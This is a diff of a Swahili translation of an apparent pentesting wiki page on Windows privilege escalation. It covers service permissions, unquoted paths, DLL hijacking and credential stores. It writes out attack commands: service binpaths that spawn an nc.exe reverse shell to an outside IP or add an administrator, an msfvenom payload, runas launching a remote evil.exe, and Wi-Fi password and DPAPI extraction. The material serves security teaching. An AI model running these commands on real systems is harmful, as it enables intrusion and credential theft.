@@ -402,7 +405,7 @@ icacls "%%z" ) ) ``` -**Kuangalia ruhusa za folda za binaries za michakato (**[**DLL Hijacking**](dll-hijacking/index.html)**)** +**Kukagua ruhusa za folda za binaries za michakato (**[**DLL Hijacking**](dll-hijacking/index.html)**)** ```bash for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do ( @@ -410,19 +413,19 @@ icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone todos %username%" && echo. ) ``` -### Uchimbaji wa Nywila za Kumbukumbu +### Memory Password mining -Unaweza kuunda dump ya kumbukumbu ya mchakato unaoendelea ukitumia **procdump** kutoka sysinternals. Huduma kama FTP zina **nywila wazi wazi katika kumbukumbu**, jaribu kutupa kumbukumbu na kusoma nywila. +Unaweza kuunda memory dump ya process inayokimbia kwa kutumia **procdump** kutoka sysinternals. Huduma kama FTP zina **credentials in clear text in memory**, jaribu kufanya memory dump na kusoma credentials. ```bash procdump.exe -accepteula -ma ``` -### Insecure GUI apps +### Programu za GUI zisizo salama -**Programu zinazotembea kama SYSTEM zinaweza kumruhusu mtumiaji kuzindua CMD, au kuvinjari saraka.** +**Programu zinazoendeshwa kama SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.** Mfano: "Windows Help and Support" (Windows + F1), tafuta "command prompt", bonyeza "Click to open Command Prompt" -## Services +## Huduma Pata orodha ya huduma: ```bash 
@@ -431,46 +434,46 @@ wmic service list brief sc query Get-Service ``` -### Permissions +### Ruhusa Unaweza kutumia **sc** kupata taarifa za huduma ```bash sc qc ``` -Inashauriwa kuwa na binary **accesschk** kutoka _Sysinternals_ ili kuangalia kiwango cha ruhusa kinachohitajika kwa kila huduma. +Inashauriwa kuwa na binary **accesschk** kutoka kwa _Sysinternals_ ili kuangalia ngazi ya ruhusa inayohitajika kwa kila huduma. ```bash accesschk.exe -ucqv #Check rights for different groups ``` -Inashauriwa kuangalia kama "Authenticated Users" wanaweza kubadilisha huduma yoyote: +Inashauriwa kuangalia ikiwa "Authenticated Users" wanaweza kubadilisha huduma yoyote: ```bash accesschk.exe -uwcqv "Authenticated Users" * /accepteula accesschk.exe -uwcqv %USERNAME% * /accepteula accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version ``` -[Unaweza kupakua accesschk.exe kwa XP hapa](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) +[You can download accesschk.exe for XP for here](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) ### Wezesha huduma -Ikiwa unapata kosa hili (kwa mfano na SSDPSRV): +Ikiwa unapata hitilafu hii (kwa mfano na SSDPSRV): -_Kosa la mfumo 1058 limetokea._\ -_Huduma haiwezi kuanzishwa, ama kwa sababu imezimwa au kwa sababu haina vifaa vilivyowezeshwa vinavyohusishwa nayo._ +_System error 1058 has occurred._\ +_The service cannot be started, either because it is disabled or because it has no enabled devices associated with it._ -Unaweza kuifanya iweze kutumia +Unaweza kuiwezesha kwa kutumia ```bash sc config SSDPSRV start= demand sc config SSDPSRV obj= ".\LocalSystem" password= "" ``` -**Chukua katika akaunti kwamba huduma upnphost inategemea SSDPSRV ili kufanya kazi (kwa XP SP1)** +**Kumbuka kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)** -**Njia nyingine ya kutatua** tatizo hili ni kukimbia: 
+**Suluhisho mbadala** kwa tatizo hili ni kuendesha: ``` sc.exe config usosvc start= auto ``` -### **Badilisha njia ya binary ya huduma** +### **Modify service binary path** -Katika hali ambapo kundi la "Watumiaji walioidhinishwa" lina **SERVICE_ALL_ACCESS** kwenye huduma, mabadiliko ya binary ya kutekeleza ya huduma yanawezekana. Ili kubadilisha na kutekeleza **sc**: +Katika tukio ambapo kundi "Authenticated users" linamiliki **SERVICE_ALL_ACCESS** kwa service, inawezekana kubadilisha executable binary ya service. Ili kubadilisha na kuendesha **sc**: ```bash sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" sc config binpath= "net localgroup administrators username /add" 
@@ -478,25 +481,25 @@ sc config binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cm sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe" ``` -### Anzisha huduma +### Anzisha upya huduma ```bash wmic service NAMEOFSERVICE call startservice net stop [service name] && net start [service name] ``` -Privileges zinaweza kupandishwa kupitia ruhusa mbalimbali: +Kupandishwa kwa ruhusa (privilege escalation) kunaweza kutokea kupitia ruhusa zifuatazo: -- **SERVICE_CHANGE_CONFIG**: Inaruhusu kubadilisha usanidi wa binary ya huduma. -- **WRITE_DAC**: Inaruhusu kubadilisha ruhusa, na hivyo kuweza kubadilisha usanidi wa huduma. +- **SERVICE_CHANGE_CONFIG**: Inaruhusu kusanidi tena binary ya service. +- **WRITE_DAC**: Inaruhusu kubadilisha ruhusa, ikiongoza kwa uwezo wa kubadilisha usanidi wa service. - **WRITE_OWNER**: Inaruhusu kupata umiliki na kubadilisha ruhusa. -- **GENERIC_WRITE**: Inarithi uwezo wa kubadilisha usanidi wa huduma. -- **GENERIC_ALL**: Pia inarithi uwezo wa kubadilisha usanidi wa huduma. +- **GENERIC_WRITE**: Inajumuisha uwezo wa kubadilisha usanidi wa service. +- **GENERIC_ALL**: Pia inajumuisha uwezo wa kubadilisha usanidi wa service. -Kwa ajili ya kugundua na kutumia udhaifu huu, _exploit/windows/local/service_permissions_ inaweza kutumika. +Kwa kugundua na kutumia udhaifu huu, _exploit/windows/local/service_permissions_ inaweza kutumika. 
-### Ruhusa dhaifu za binaries za huduma +### Ruhusa dhaifu kwa binaries za huduma -**Angalia kama unaweza kubadilisha binary inayotekelezwa na huduma** au kama una **ruhusa za kuandika kwenye folda** ambapo binary inapatikana ([**DLL Hijacking**](dll-hijacking/index.html))**.**\ -Unaweza kupata kila binary inayotekelezwa na huduma kwa kutumia **wmic** (sio katika system32) na kuangalia ruhusa zako kwa kutumia **icacls**: +**Angalia kama unaweza kubadilisha binary inayotekelezwa na huduma** au kama una **ruhusa za kuandika kwenye folda** ambapo binary iko ([**DLL Hijacking**](dll-hijacking/index.html))**.**\ +Unaweza kupata kila binary inayotekelezwa na huduma kwa kutumia **wmic** (sio kwenye system32) na kukagua ruhusa zako kwa kutumia **icacls**: ```bash for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt @@ -508,10 +511,10 @@ sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt ``` -### Services registry modify permissions +### Idhini za kubadilisha rejista ya huduma -Unapaswa kuangalia kama unaweza kubadilisha ruhusa za huduma yoyote ya rejista.\ -Unaweza **kuangalia** ruhusa zako juu ya **rejista** ya huduma kwa kufanya: +Unapaswa kuangalia kama unaweza kubadilisha rejista yoyote ya huduma.\ +Unaweza **kuangalia** **idhini** zako juu ya **rejista** ya huduma kwa kufanya: ```bash reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services 
@@ -520,32 +523,31 @@ for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\ get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i " Users Path Everyone" ``` -Inapaswa kuangaliwa ikiwa **Authenticated Users** au **NT AUTHORITY\INTERACTIVE** wana ruhusa za `FullControl`. Ikiwa ndivyo, faili ya binary inayotekelezwa na huduma inaweza kubadilishwa. +Inapaswa kukaguliwa ikiwa **Authenticated Users** au **NT AUTHORITY\INTERACTIVE** wanamiliki ruhusa za `FullControl`. Ikiwa ndivyo, binary inayotekelezwa na huduma inaweza kubadilishwa. -Ili kubadilisha Njia ya faili ya binary inayotekelezwa: +Ili kubadilisha Path ya binary inayotekelezwa: ```bash reg add HKLM\SYSTEM\CurrentControlSet\services\ /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f ``` -### Huduma za rejista Ruhusa za AppendData/AddSubdirectory - -Ikiwa una ruhusa hii juu ya rejista hii inamaanisha **unaweza kuunda sub registries kutoka hii**. Katika kesi ya huduma za Windows hii ni **ya kutosha kutekeleza msimbo wowote:** +### Services registry AppendData/AddSubdirectory permissions +Ikiwa una ruhusa hii juu ya registry, hii inamaanisha kwamba **unaweza kuunda sub registries kutoka hii**. Katika kesi ya Windows services hili ni **la kutosha kutekeleza arbitrary code:** {{#ref}} appenddata-addsubdirectory-permission-over-service-registry.md {{#endref}} -### Njia za Huduma zisizo na Nukuu +### Unquoted Service Paths -Ikiwa njia ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila kitu kinachomalizika kabla ya nafasi. +Ikiwa path ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu kabla ya nafasi. 
-Kwa mfano, kwa njia _C:\Program Files\Some Folder\Service.exe_ Windows itajaribu kutekeleza: +Kwa mfano, kwa path _C:\Program Files\Some Folder\Service.exe_ Windows itajaribu kutekeleza: ```bash C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exe ``` -Orodha ya njia za huduma zisizo na nukuu, ukiondoa zile zinazomilikiwa na huduma za Windows zilizojengwa ndani: +Orodhesha njia zote za huduma zisizokuwa zimewekwa kwa nukuu, ukiacha zile za huduma za Windows zilizojengwa: ```bash wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"' wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services 
@@ -565,19 +567,19 @@ echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && ```bash gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` -**Unaweza kugundua na kutumia** udhaifu huu kwa kutumia metasploit: `exploit/windows/local/trusted\_service\_path` Unaweza kuunda binary ya huduma kwa mikono kwa kutumia metasploit: +Unaweza kugundua na kutumia udhaifu huu kwa metasploit: `exploit/windows/local/trusted\_service\_path` Unaweza kuunda service binary kwa mikono ukitumia metasploit: ```bash msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe ``` -### Hatua za Kuokoa +### Hatua za Urejeshaji -Windows inaruhusu watumiaji kubaini hatua zitakazochukuliwa ikiwa huduma itashindwa. Kipengele hiki kinaweza kuwekewa mipangilio ili kuelekeza kwenye binary. Ikiwa binary hii inaweza kubadilishwa, kupandisha hadhi kunaweza kuwa na uwezekano. Maelezo zaidi yanaweza kupatikana katika [nyaraka rasmi](). +Windows inaruhusu watumiaji kubainisha vitendo vinavyopaswa kuchukuliwa ikiwa huduma itashindwa. Kipengele hiki kinaweza kusanidiwa kuonyesha binary. Ikiwa binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanaweza kupatikana katika [official documentation](). -## Maombi +## Programu -### Maombi Yaliyosakinishwa +### Programu zilizowekwa -Angalia **idhini za binaries** (labda unaweza kuandika moja na kupandisha hadhi) na za **folders** ([DLL Hijacking](dll-hijacking/index.html)). +Angalia **permissions of the binaries** (labda unaweza overwrite moja na kupata privilege escalation) na za **folders** ([DLL Hijacking](dll-hijacking/index.html)). ```bash dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" 
@@ -588,9 +590,9 @@ Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name ``` ### Ruhusa za Kuandika -Angalia kama unaweza kubadilisha faili fulani ya usanidi ili kusoma faili maalum au ikiwa unaweza kubadilisha faili fulani ambayo itatekelezwa na akaunti ya Msimamizi (schedtasks). +Angalia ikiwa unaweza kuhariri baadhi ya config file ili kusoma faili maalum, au ikiwa unaweza kuhariri binary itakayotekelezwa na Administrator account (schedtasks). -Njia moja ya kupata ruhusa dhaifu za folda/faili katika mfumo ni kufanya: +Njia ya kutafuta ruhusa dhaifu za folda/faili katika mfumo ni kufanya: ```bash accesschk.exe /accepteula # Find all weak folder permissions per drive. 
@@ -613,40 +615,49 @@ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Ac Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}} ``` -### Run at startup +### Endeshwa wakati wa kuanza + +**Angalia ikiwa unaweza kuandika upya baadhi ya registry au binary ambayo itatekelezwa na mtumiaji tofauti.**\ +**Soma** **ukurasa ufuatao** ili ujifunze zaidi kuhusu maeneo ya **autoruns** yanayovutia kwa ajili ya **escalate privileges**: -**Angalia kama unaweza kubadilisha baadhi ya registry au binary ambayo itatekelezwa na mtumiaji tofauti.**\ -**Soma** **ukurasa ufuatao** kujifunza zaidi kuhusu maeneo ya **autoruns ya kuvutia ili kupandisha mamlaka**: {{#ref}} privilege-escalation-with-autorun-binaries.md {{#endref}} -### Drivers +### Madereva -Tafuta madereva ya **third party ya ajabu/yenye udhaifu**. +Tafuta madereva ya **wadau wa tatu** yanayoweza kuwa **yasiyo ya kawaida au yenye udhaifu** ```bash driverquery driverquery.exe /fo table driverquery /SI ``` +Kama driver inatoa arbitrary kernel read/write primitive (common katika IOCTL handlers zilizobuniwa vibaya), unaweza escalate kwa kuiba SYSTEM token moja kwa moja kutoka kernel memory. Angalia mbinu hatua‑kwa‑hatua hapa: + +{{#ref}} +arbitrary-kernel-rw-token-theft.md +{{#endref}} + + ## PATH DLL Hijacking -Ikiwa una **idhini za kuandika ndani ya folda iliyopo kwenye PATH** unaweza kuwa na uwezo wa kuingilia DLL inayopakuliwa na mchakato na **kuinua mamlaka**. +Ikiwa una **write permissions inside a folder present on PATH**, unaweza hijack a DLL loaded by a process na hivyo **escalate privileges**. 
-Angalia idhini za folda zote ndani ya PATH: +Kagua ruhusa za folda zote ndani ya PATH: ```bash for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. ) ``` -Kwa maelezo zaidi kuhusu jinsi ya kutumia udhibiti huu: +Kwa maelezo zaidi kuhusu jinsi ya kutumia vibaya ukaguzi huu: + {{#ref}} dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md {{#endref}} -## Mtandao +## Network -### Kushiriki +### Shares ```bash net view #Get a list of computers net view /all /domain [domainname] #Shares on the domains @@ -656,23 +667,23 @@ net share #Check current shares ``` ### hosts file -Angalia kompyuta nyingine zinazojulikana zilizowekwa kwa nguvu kwenye faili la hosts +Angalia kompyuta nyingine zinazojulikana zilizowekwa hardcoded kwenye hosts file ``` type C:\Windows\System32\drivers\etc\hosts ``` -### Interfaces za Mtandao & DNS +### Violesura vya Mtandao & DNS ``` ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft ``` -### Open Ports +### Bandari Zilizofunguliwa -Angalia **huduma zilizozuiliwa** kutoka nje +Angalia kwa **huduma zilizozuiliwa** kutoka nje ```bash netstat -ano #Opened ports? ``` -### Jedwali la Mwelekeo +### Jedwali la Routing ``` route print Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex 
@@ -684,27 +695,27 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L ``` ### Firewall Rules -[**Angalia ukurasa huu kwa amri zinazohusiana na Firewall**](../basic-cmd-for-pentesters.md#firewall) **(orodhesha sheria, tengeneza sheria, zima, zima...)** +[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(orodhesha sheria, unda sheria, zima, zima...)** -Zaidi[ amri za kuhesabu mtandao hapa](../basic-cmd-for-pentesters.md#network) +Zaidi[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network) ### Windows Subsystem for Linux (wsl) ```bash C:\Windows\System32\bash.exe C:\Windows\System32\wsl.exe ``` -Binary `bash.exe` inaweza pia kupatikana katika `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` +Binary `bash.exe` pia inaweza kupatikana katika `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` -Ikiwa unapata mtumiaji wa root unaweza kusikiliza kwenye bandari yoyote (wakati wa kwanza unapotumia `nc.exe` kusikiliza kwenye bandari itakuuliza kupitia GUI ikiwa `nc` inapaswa kuruhusiwa na firewall). +Ikiwa unapata root user unaweza kusikiliza kwenye bandari yoyote (mara ya kwanza unapotumia `nc.exe` kusikiliza kwenye bandari itakuuliza kupitia GUI kama `nc` inapaswa kuruhusiwa na firewall). ```bash wsl whoami ./ubuntun1604.exe config --default-user root wsl whoami wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' ``` -Ili kuanza bash kama root kwa urahisi, unaweza kujaribu `--default-user root` +Ili kuanzisha bash kama root kwa urahisi, unaweza kujaribu `--default-user root` -Unaweza kuchunguza mfumo wa faili wa `WSL` katika folda `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` +Unaweza kuchunguza mfumo wa faili wa `WSL` kwenye folda `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` ## Windows Credentials 
@@ -723,13 +734,13 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDef ### Credentials manager / Windows vault From [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\ -Windows Vault inahifadhi akauti za mtumiaji kwa seva, tovuti na programu nyingine ambazo **Windows** inaweza **kuingia kwa watumiaji kiotomatiki**. Katika hali ya kwanza, hii inaweza kuonekana kama sasa watumiaji wanaweza kuhifadhi akauti zao za Facebook, akauti za Twitter, akauti za Gmail n.k., ili waingie kiotomatiki kupitia vivinjari. Lakini si hivyo. +The Windows Vault inahifadhi nywila za watumiaji za seva, tovuti na programu nyingine ambazo **Windows** inaweza **log in the users automaticall**y. Kwa mtazamo wa kwanza, inaweza kuonekana kama watumiaji wanaweza kuhifadhi Facebook credentials, Twitter credentials, Gmail credentials n.k., ili wawe wanaingia moja kwa moja kupitia vivinjari. Lakini si hivyo. -Windows Vault inahifadhi akauti ambazo Windows inaweza kuingia kwa watumiaji kiotomatiki, ambayo inamaanisha kwamba **programu yoyote ya Windows inayohitaji akauti ili kufikia rasilimali** (seva au tovuti) **inaweza kutumia Credential Manager** & Windows Vault na kutumia akauti zilizotolewa badala ya watumiaji kuingiza jina la mtumiaji na nenosiri kila wakati. +Windows Vault inahifadhi nywila ambazo Windows inaweza kuingia watumiaji kwa njia ya moja kwa moja, ambayo ina maana kuwa programu yoyote **Windows application that needs credentials to access a resource** (server or a website) **can make use of this Credential Manager** & Windows Vault na kutumia nywila zilizotolewa badala ya watumiaji kuingiza jina la mtumiaji na nenosiri kila wakati. -Ila programu zinaposhirikiana na Credential Manager, sidhani kama inawezekana kwao kutumia akauti za rasilimali fulani. 
Hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani **kuwasiliana na meneja wa akauti na kuomba akauti za rasilimali hiyo** kutoka kwenye vault ya uhifadhi wa kawaida. +Isipokuwa programu zinashirikiana na Credential Manager, sidhani kuwa zinaweza kutumia nywila za rasilimali fulani. Kwa hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa njia fulani **communicate with the credential manager and request the credentials for that resource** kutoka kwenye default storage vault. -Tumia `cmdkey` kuorodhesha akauti zilizohifadhiwa kwenye mashine. +Tumia `cmdkey` kuorodhesha nywila zilizohifadhiwa kwenye mashine. ```bash cmdkey /list Currently stored credentials: 
@@ -737,38 +748,38 @@ Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator ``` -Kisha unaweza kutumia `runas` na chaguo la `/savecred` ili kutumia akiba ya taarifa za kuingia. Mfano ufuatao unaita binary ya mbali kupitia sehemu ya SMB. +Kisha unaweza kutumia `runas` kwa chaguo la `/savecred` ili kutumia saved credentials. Mfano ufuatao unaita remote binary kupitia SMB share. ```bash runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" ``` -Kutumia `runas` na seti ya akidi zilizotolewa. +Kutumia `runas` na seti ya vitambulisho vilivyotolewa. ```bash C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" ``` -Note that mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html), or from [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1). +Kumbuka kwamba mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html), au kutoka [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1). ### DPAPI -**Data Protection API (DPAPI)** inatoa njia ya usimbaji wa data wa simetriki, hasa inayotumika ndani ya mfumo wa uendeshaji wa Windows kwa usimbaji wa funguo za kibinafsi zisizo za simetriki. Usimbaji huu unatumia siri ya mtumiaji au mfumo kuchangia kwa kiasi kikubwa katika entropy. +The **Data Protection API (DPAPI)** provides a method for symmetric encryption of data, predominantly used within the Windows operating system for the symmetric encryption of asymmetric private keys. This encryption leverages a user or system secret to significantly contribute to entropy. 
-**DPAPI inaruhusu usimbaji wa funguo kupitia funguo za simetriki ambazo zinatokana na siri za kuingia za mtumiaji**. Katika hali zinazohusisha usimbaji wa mfumo, inatumia siri za uthibitishaji wa kikoa cha mfumo. +**DPAPI enables the encryption of keys through a symmetric key that is derived from the user's login secrets**. In scenarios involving system encryption, it utilizes the system's domain authentication secrets. -Funguo za RSA za mtumiaji zilizohifadhiwa, kwa kutumia DPAPI, zinahifadhiwa katika saraka ya `%APPDATA%\Microsoft\Protect\{SID}`, ambapo `{SID}` inawakilisha [Identifier ya Usalama](https://en.wikipedia.org/wiki/Security_Identifier) wa mtumiaji. **Funguo ya DPAPI, iliyoko pamoja na funguo kuu inayolinda funguo za kibinafsi za mtumiaji katika faili hiyo hiyo**, kwa kawaida ina bytes 64 za data za nasibu. (Ni muhimu kutambua kwamba ufikiaji wa saraka hii umewekwa vizuizi, kuzuia orodha ya yaliyomo kupitia amri ya `dir` katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell). +Funguo za RSA za mtumiaji zilizofichwa kwa kutumia DPAPI zinawekwa katika saraka `%APPDATA%\Microsoft\Protect\{SID}`, ambapo `{SID}` inawakilisha [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier). **Funguo ya DPAPI, iliyoko pamoja na master key inayolinda funguo za kibinafsi za mtumiaji katika faili sawa**, kwa kawaida inajumuisha data ya nasibu ya bytes 64. (Ni muhimu kutambua kuwa ufikiaji wa saraka hii umewekewa mipaka, ukizuia kuorodhesha yaliyomo kwa kutumia amri ya `dir` katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell). ```bash Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\ Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\ ``` -Unaweza kutumia **mimikatz module** `dpapi::masterkey` na hoja sahihi (`/pvk` au `/rpc`) ili kuifungua. +Unaweza kutumia **mimikatz module** `dpapi::masterkey` na vigezo vinavyofaa (`/pvk` au `/rpc`) kuibomoa usimbaji. 
-Faili za **akisi zilizolindwa na nenosiri kuu** kwa kawaida zinapatikana katika: +The **credentials files protected by the master password** are usually located in: ```bash dir C:\Users\username\AppData\Local\Microsoft\Credentials\ dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ ``` -Unaweza kutumia **mimikatz module** `dpapi::cred` pamoja na `/masterkey` inayofaa ili kufungua.\ -Unaweza **kuchota DPAPI nyingi** **masterkeys** kutoka **kumbukumbu** kwa kutumia `sekurlsa::dpapi` module (ikiwa wewe ni root). +Unaweza kutumia **mimikatz module** `dpapi::cred` na `/masterkey` inayofaa ili decrypt.\ +Unaweza **extract many DPAPI** **masterkeys** kutoka **memory** kwa kutumia module `sekurlsa::dpapi` (ikiwa wewe ni root). {{#ref}} dpapi-extracting-passwords.md @@ -776,9 +787,9 @@ dpapi-extracting-passwords.md ### PowerShell Credentials -**PowerShell credentials** mara nyingi hutumiwa kwa ajili ya **scripting** na kazi za automatisering kama njia ya kuhifadhi akiba za siri zilizofichwa kwa urahisi. Akiba hizo zinalindwa kwa kutumia **DPAPI**, ambayo kwa kawaida inamaanisha zinaweza kufunguliwa tu na mtumiaji yule yule kwenye kompyuta ile ile zilipoundwa. +**PowerShell credentials** mara nyingi hutumika kwa ajili ya **scripting** na kazi za automation kama njia ya kuhifadhi credentials zilizofichwa kwa urahisi. Credentials hizi zinalindwa kwa kutumia **DPAPI**, ambayo kwa kawaida inamaanisha zinaweza tu decrypted na mtumiaji huyo kwenye kompyuta ile ile zilipofanywa. -Ili **kufungua** akiba ya PS kutoka kwenye faili inayoiweka unaweza kufanya: +Ili **decrypt** PS credentials kutoka kwenye faili inayoihifadhi, unaweza kufanya: ```bash PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml' PS C:\> $credential.GetNetworkCredential().username 
@@ -798,34 +809,34 @@ netsh wlan show profile key=clear #Oneliner to extract all wifi passwords cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on* ``` -### Saved RDP Connections +### Muunganisho za RDP Zilizohifadhiwa Unaweza kuzipata kwenye `HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\`\ na katika `HKCU\Software\Microsoft\Terminal Server Client\Servers\` -### Recently Run Commands +### Amri zilizotekelezwa hivi karibuni ``` HCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU HKCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ``` -### **Meneja ya Akiba ya Kitambulisho cha Desktop ya Kijijini** +### **Meneja wa Nyaraka za Kuingia za Remote Desktop** ``` %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings ``` -Tumia moduli ya **Mimikatz** `dpapi::rdg` pamoja na `/masterkey` inayofaa ili **kufungua faili zozote za .rdg**\ -Unaweza **kuchota masterkeys nyingi za DPAPI** kutoka kwenye kumbukumbu kwa kutumia moduli ya Mimikatz `sekurlsa::dpapi` +Tumia **Mimikatz** `dpapi::rdg` module na `/masterkey` inayofaa ili **ku-decrypt any .rdg files**\ +Unaweza **extract many DPAPI masterkeys** kutoka memory kwa moduli ya Mimikatz `sekurlsa::dpapi` module ### Sticky Notes -Watu mara nyingi hutumia programu ya StickyNotes kwenye vituo vya kazi vya Windows kuhifadhi **nywila** na taarifa nyingine, bila kujua ni faili ya database. Faili hii iko katika `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` na daima inafaa kutafutwa na kuchunguzwa. +Watu mara nyingi hutumia app ya StickyNotes kwenye Windows workstations kuhifadhi **passwords** na taarifa nyingine, bila kutambua kuwa ni faili ya database. 
Faili hii iko kwenye `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` na daima inastahili kutafutwa na kuchunguzwa. ### AppCmd.exe -**Kumbuka kwamba ili kurejesha nywila kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha chini ya kiwango cha Juu cha Uaminifu.**\ -**AppCmd.exe** iko katika saraka ya `%systemroot%\system32\inetsrv\` .\ -Ikiwa faili hii ipo basi inawezekana kwamba baadhi ya **akidi** zimewekwa na zinaweza **kurejeshwa**. +**Kumbuka kwamba ili recover passwords kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha kwa ngazi ya High Integrity.**\ +**AppCmd.exe** iko katika `%systemroot%\system32\inetsrv\` directory.\ +Ikiwa faili hii ipo basi inawezekana kwamba baadhi ya **credentials** zimetangazwa na zinaweza **kupatikana**. -Huu ni msimbo uliochukuliwa kutoka [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): +Msimbo huu umetolewa kutoka [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): ```bash function Get-ApplicationHost { $OrigError = $ErrorActionPreference 
